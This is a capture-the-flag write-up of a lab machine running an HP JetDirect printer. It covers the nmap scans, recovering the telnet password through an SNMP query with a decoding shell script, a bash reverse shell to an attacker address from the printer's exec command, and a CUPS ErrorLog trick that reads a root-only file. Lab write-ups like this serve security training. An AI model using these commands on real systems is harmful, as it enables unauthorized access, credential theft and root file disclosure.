# Nmap 7.80 scan initiated Sun Nov 21 16:21:03 2021 as: nmap -vvv -p 23 -sS -sV -sC -oN 10.10.11.107.antique.nmap.txt 10.10.11.107
Nmap scan report for 10.10.11.107
Host is up, received echo-reply ttl 63 (0.082s latency).
Scanned at 2021-11-21 16:21:03 PST for 166s
PORT STATE SERVICE REASON VERSION
23/tcp open telnet? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Nov 21 16:23:49 2021 -- 1 IP address (1 host up) scanned in 165.80 seconds
Scanning TCP didn't show much besides HP JetDirect listening on telnet/23. Note that nmap labels the service "telnet?" because it answers every probe with the same "JetDirect" / "Password:" banner, so it is really the JetDirect management CLI rather than a stock telnet daemon. In the spirit of enumerating further I started a UDP scan of the top 1000 ports, which takes a while.
# Nmap 7.80 scan initiated Sun Nov 21 16:19:04 2021 as: nmap -vvv -sU -sV -oN 10.10.11.107.UDP.antique.nmap.txt 10.10.11.107
Increasing send delay for 10.10.11.107 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.10.11.107
Host is up, received echo-reply ttl 63 (0.080s latency).
Scanned at 2021-11-21 16:19:04 PST for 1093s
Not shown: 999 closed ports
Reason: 999 port-unreaches
PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response SNMPv1 server (public)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Nov 21 16:37:17 2021 -- 1 IP address (1 host up) scanned in 1093.24 seconds
We find that the printer also has SNMP open (161/udp), running SNMPv1 with the default read community string "public". After some Google searching we find a few interesting articles about using snmpget against the HP enterprise MIB to recover the JetDirect password:
How SNMP port works - What is an SNMP port number?
Hacking Network Printers (Mostly HP JetDirects, but a little info on the Ricoh Savins)
$ snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 [...trimmed the rest is junk...]
$ echo '50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33' | xxd -r -p
P@ssw0rd@123!!123
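The hex-to-ASCII step above is done by hand, trimming the junk bytes by eye. The following POSIX shell function, added here as an example and not part of the original writeup, takes the full snmpget output line and decodes it, stopping at the first non-printable byte so the trailing junk never ends up pasted into the telnet password prompt. It assumes the password is a run of printable ASCII followed by at least one non-printable byte; the sample line is constructed from the writeup's output, and the bytes after 0x33 are made up to stand in for the trimmed junk. The `get_jetdirect_password` wrapper is the same snmpget call as above and needs net-snmp and network reach; only the decoder runs offline.

```shell
#!/bin/sh
# Added example, not from the original writeup: decode the BITS value that
# snmpget returns for the JetDirect password OID (.1.3.6.1.4.1.11.2.3.9.1.1.13.0)
# into a printable string, dropping the trailing junk bytes.
# Assumption: the password is printable ASCII terminated by a non-printable byte.

# Usage: decode_jetdirect_password "<one full snmpget output line>"
decode_jetdirect_password() {
    line=$1
    # Everything after "= BITS:" is a run of space-separated hex octets.
    hex=$(printf '%s\n' "$line" | sed -n 's/.*= *BITS: *//p')
    if [ -z "$hex" ]; then
        echo "no BITS value found in input" >&2
        return 1
    fi
    out=''
    for octet in $hex; do
        # snmpget prints octets as exactly two hex digits; stop at anything else
        # (for example the "[...trimmed...]" marker in the writeup).
        case "$octet" in
            [0-9a-fA-F][0-9a-fA-F]) ;;
            *) break ;;
        esac
        dec=$((0x$octet))
        # Stop at the first byte outside printable ASCII (0x20..0x7e): that is
        # where the password ends and the junk begins.
        if [ "$dec" -lt 32 ] || [ "$dec" -gt 126 ]; then
            break
        fi
        # Append the byte via printf's octal escape so no bash-only features are needed.
        out="$out$(printf "\\$(printf '%03o' "$dec")")"
    done
    printf '%s\n' "$out"
}

# Convenience wrapper: same OID and community string as the writeup.
# Usage: get_jetdirect_password <host> [community]
get_jetdirect_password() {
    host=$1
    community=${2:-public}
    decode_jetdirect_password "$(snmpget -v 1 -c "$community" "$host" .1.3.6.1.4.1.11.2.3.9.1.1.13.0)"
}

# Constructed sample line modelled on the writeup's snmpget output; the octets
# after "33" (0a 00 ff 10 3b) are invented stand-ins for the trimmed junk.
SAMPLE='iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 0a 00 ff 10 3b'

# Running this file directly prints the decoded password for the sample.
decode_jetdirect_password "$SAMPLE"
```

The decoder is deliberately strict about the input shape: a line that carries a STRING or OCTET STRING value instead of BITS makes it fail loudly rather than return an empty password, which is what you want when scripting this against more than one device.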
Once we have this password we can log in via telnet. From the JetDirect CLI it is quickly apparent that we can run commands with exec. With a listener waiting on 10.10.14.10:32000, I ran a bash reverse shell from the JetDirect CLI to get a connection back and read the user.txt flag.
> exec bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/32000 <&1'
This one was a bit tricky. Eventually we found that we were in the lpadmin group, which allows us to administer the CUPS daemon via its web interface. The web interface was only listening locally, so I used chisel to forward the victim machine's port 631 to my attacker box on localhost:8001 so that I could reach the Administration UI. I wasn't really sure what to do here, but there's a Metasploit module that I eventually found in a writeup after giving up and hitting a wall. The module essentially uses cupsctl to set the ErrorLog path to any arbitrary file that we'd like to read: because cupsd runs as root and members of lpadmin are trusted to change its configuration, pointing ErrorLog at a root-only file and then viewing the error log through the web interface returns that file's contents.
metasploit-framework/cups_root_file_read.rb at master · rapid7/metasploit-framework
On the victim machine I simply ran the following command: cupsctl ErrorLog=/root/root.txt
and visited the error log page to get the root flag: curl http://localhost:631/admin/log/error_log